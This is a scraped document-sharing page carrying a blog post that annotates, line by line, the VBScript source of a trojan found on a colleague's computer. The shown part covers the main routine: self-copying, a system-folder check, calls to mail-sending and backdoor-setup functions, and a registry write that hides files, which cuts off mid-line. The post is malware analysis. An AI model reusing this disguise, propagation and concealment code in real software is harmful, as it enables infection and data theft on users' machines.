- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
北邮男生木马”代码全注释 -
北邮男生木马”代码全注释 -
“北邮男生木马”代码全注释 - sjdev的专栏(申俊杰) - CSDN博客您还未登录!|登录|注册|帮助CSDN
上周的某一天,我同事忽然发现自己电脑不太对劲,经查看原来是中了木马。比较有意思的是,可以通过一个bupt.dat的文件来查看该木马的某些实现细节。由于bupt是北邮的简称,所以我有充分的理由相信该木马是北邮某个学生搞的。“北邮男生”是我们给这个木马起的名字,至于为什么叫“男生”而不是“女生”或者其它代号,可以通过下面的代码自己寻找答案。Ps:请不要试图查找有关“北邮男生”木马的信息,也许它会被冠以其他名字。Psps:截止到2009/10/19,通过关键字“bupt.dat”百度无法搜索到任何相关信息,
我在CSDN上发表了这个文章的一个简短版本,部分网友表示“这个木马太简单”。我想说的是:1.论坛上发表的只是整个脚本的一部分,因为输入有限制。2.这个木马还包含其他文件。因为很明显,脚本是不可能自动执行的。这些其他的文件包括:一个autorun.inf、一个scs、一个svchost(其实这个是WScript.exe,请详看代码注释说明)、还包括tlntsvr服务。
另外:我重新使用bupt.dat关键字搜索了一下,大家可以分析一下google的结果。
主代码部分
view plaincopy to clipboardprint?
1.主体函数部分
当运行脚本时,主体函数部分代码依次执行
所以分析脚本“主体函数部分”可以看出脚本程序执行思路
On Error Resume Next
创建文件系统对象,用于文件操作
Set fso = CreateObject(Scripting.FileSystemObject)
创建Shell对象
Set WshShell = CreateObject(WScript.Shell)
创建NetWork对象
Set WshNetWork = WScript.CreateObject(Wscript.NetWork)
脚本的全路径名,如J:\Butp.dat
ThisPath = WScript.ScriptFullName
1 for system folder.通常返回值是C:\Windows\System32
SysDir = fso.GetSpecialFolder(1) \
从SysDir从截取Windows目录,如C:\Windows\System32截取后为C:\Windows\
WinDir = Left(SysDir, 11)
SvcHost = svchost.exe
FnSys = svchost.dat
FnSysExe = scs.exe
FnMail = liam.dat
FnuTray = bupt.dat
FnuTrayExe = scs
Copy脚本的副本
Set file = fso.OpenTextFile(ThisPath, 1) 1 for readonly
VBScriptCopy = file.ReadAll
file.Close
Set file = Nothing
IF LCase(SysDir) = LCase(Left(ThisPath, Len(SysDir))) Then
如果脚本文件位于系统目录(system32)下
Call SendMail
Call SetupBD
Call ListEnuTray
Else
不显示隐藏文件
WshShell.RegWrite
HKCU\SoftWare\Microsoft\Windows\CurrentVersion\Explorer\Advanced\showsuper
您可能关注的文档
最近下载
- 2024-2025学年四川省成都市第七中学高一(上)月考物理试卷(10月)(含答案).docx VIP
- 育婴员职业守则课件.pptx VIP
- 蔬菜生产技术课程标准.docx VIP
- 2025中考语文现代文阅读总复习-第1部分 专题12:记叙文阅读之主旨把握(讲义)(教师版).docx VIP
- 硅铁冶炼培训课件.pptx VIP
- 水土保持工程监理规划.pdf VIP
- 政务云平台 第4部分:系统部署和迁移要求_地方标准编制说明.pdf
- DB37T-政务云平台监管指标体系及编制说明.pdf VIP
- 高中物理必修二第一章检试测卷.doc VIP
- DB37T 4394.4—2024政务云平台 第4部分:系统部署和迁移要求.pdf VIP
文档评论(0)